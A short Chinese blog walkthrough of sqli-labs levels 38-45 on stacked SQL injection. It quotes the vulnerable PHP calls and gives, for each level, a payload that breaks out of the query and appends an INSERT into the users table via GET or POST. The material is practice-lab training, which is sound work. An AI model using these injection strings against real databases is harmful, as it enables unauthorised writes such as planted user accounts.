sqli-labs靶场(6)堆叠注入

Sc0fie1d included in categories Web Wp Sqli-Labs

views 2023-11-17 2023-11-17 159 words One minute

Contents

sqli-labs靶场精简记录38-45

基于错误 GET 单引号字符型堆叠注入

vul

1
2
3
4


if (mysqli_multi_query($con1, $sql))
{
    
    ...

因为存在mysqli_multi_query函数，该函数支持多条sql语句同时进行。

使用分号，来执行两条命令

插入新数据

1

1';insert into users(id,username,password) values(38,'test','1')--+

基于错误 GET 数字型堆叠注入

1

?id=1;insert into users(id,username,password) values(39,'less39','test')--+

基于布尔 GET 单引号小括号字符型盲注堆叠注入

bypass

1

?id=1');insert into users values(40,'Less40','hello')--+

关闭了报错，但是可以根据页面是否有内容来判断，语句是否正确

基于布尔 GET 数字型盲注堆叠注入

bypass

1

?id=1;insert into users values(41,'Less41','hello')--+

基于存储 POST 单引号字符型堆叠注入

1
2


   $username = mysqli_real_escape_string($con1, $_POST["login_user"]);
   $password = $_POST["login_password"];

post发包

1

login_user=1&login_password=1';insert into users(id,username,password) values ('39','less30','123456')--+&mysubmit=Login

POST型基于错误的堆叠变形字符型注入

bypass

1

1');insert into users values(43,'Less43','Less43')#

基于存储 POST 单引号字符型盲注堆叠注入

bypass

1

1';insert into users values ('44','less44','hello')#

基于存储 POST 单引号小括号字符型盲注堆叠注入

bypass

1

1');insert into users(id,username,password) values(45,'Less45','Less45')#

Contents